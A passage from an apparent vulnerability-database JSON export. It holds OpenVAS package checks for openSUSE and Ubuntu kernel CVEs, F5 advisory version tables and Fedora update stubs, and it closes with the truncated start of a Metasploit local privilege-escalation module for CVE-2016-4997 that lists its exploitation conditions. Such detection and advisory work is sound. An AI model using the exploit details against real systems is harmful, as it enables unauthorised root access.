rpm:\"kernel-ec2-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv\", rpm:\"kernel-pv~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base\", rpm:\"kernel-pv-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base-debuginfo\", rpm:\"kernel-pv-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debuginfo\", rpm:\"kernel-pv-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debugsource\", rpm:\"kernel-pv-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-devel\", rpm:\"kernel-pv-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", 
rpm:\"kernel-vanilla-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", 
rpm:\"kernel-obs-build~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa-xen\", rpm:\"kernel-obs-qa-xen~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-11T00:00:00", "id": "OPENVAS:1361412562310842798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842798", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3008-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3008-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842798\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-11 05:28:15 +0200 (Sat, 11 Jun 2016)\");\n script_cve_id(\"CVE-2016-1583\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3008-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that eCryptfs improperly attempted to use the mmap()\nhandler of a lower filesystem that did not implement one, causing a\nrecursive page fault to occur. 
A local unprivileged attacker could use to\ncause a denial of service (system crash) or possibly execute arbitrary code\nwith administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3008-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3008-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1015-snapdragon\", ver:\"4.4.0-1015.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:35", "bulletinFamily": "software", "cvelist": ["CVE-2016-4998"], "edition": 1, "description": "\nF5 Product Development has assigned CPF-23377, CPF-23378, and CPF-23379 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 
11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable1| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable1| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable1| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable1| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable1| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable1| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable1| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable1| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable1| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable1| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable1| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Low| Linux kernel \n \n1 The specified products contain the affected code. 
However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-03-14T00:54:00", "published": "2017-02-22T20:06:00", "href": "https://support.f5.com/csp/article/K74171196", "id": "F5:K74171196", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-4998", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-09T00:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "description": "\nF5 Product Development has assigned ID 623119 (BIG-IP), ID 623155 (BIG-IQ), and ID 623156 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H624225 on the **Diagnostics** > **Identified** > **Medium** screen. 
\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WOM | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 
\n11.6.2 | Not vulnerable \n\n \n\n| None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.2 | 2.1.0 - 2.3.0 | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. 
For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "edition": 1, "modified": "2017-10-31T21:08:00", "published": "2016-10-23T07:33:00", "id": "F5:K55672042", "href": "https://support.f5.com/csp/article/K55672042", "title": "Linux kernel vulnerability CVE-2016-4470", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-23T05:25:14", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to SOL21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems.\n\nMitigation\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/55/sol55672042.html", "id": "SOL55672042", "type": "f5", "title": "SOL55672042 - Linux kernel vulnerability CVE-2016-4470", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-13T22:31:14", "bulletinFamily": "software", "cvelist": ["CVE-2016-1583", "CVE-2016-2143"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable 
component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a 
custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:31:00", "published": "2017-03-07T20:55:00", "id": "F5:K10515241", "href": "https://support.f5.com/csp/article/K10515241", "title": "Linux kernel vulnerabilities CVE-2016-1583 and CVE-2016-2143", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-5728"], "description": "The kernel meta package ", "modified": "2016-06-30T21:30:47", "published": "2016-06-30T21:30:47", "id": "FEDORA:F325C6013F0A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.6.3-300.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1237", "CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4998", "CVE-2016-5728", "CVE-2016-5829"], "description": "The kernel meta package ", "modified": "2016-07-02T19:33:02", "published": "2016-07-02T19:33:02", "id": "FEDORA:4F34C605E513", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.5.7-202.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2016-09-26T21:24:11", "description": "This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1\\. 
ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) 2\\. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile Kernel 4.4.0-31-generic and newer are not vulnerable. We write the ascii files and compile on target instead of locally since metasm bombs for not having cdefs.h (even if locally installed)", "published": "2016-09-25T01:31:00", "type": "metasploit", "title": "CVE-2016-4997 Linux Kernel 4.6.3 Netfilter Privilege Escalation ", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "1970-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/LOCAL/NETFILTER_PRIV_ESC", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/netfilter_priv_esc", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \"msf/core\"\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\n only 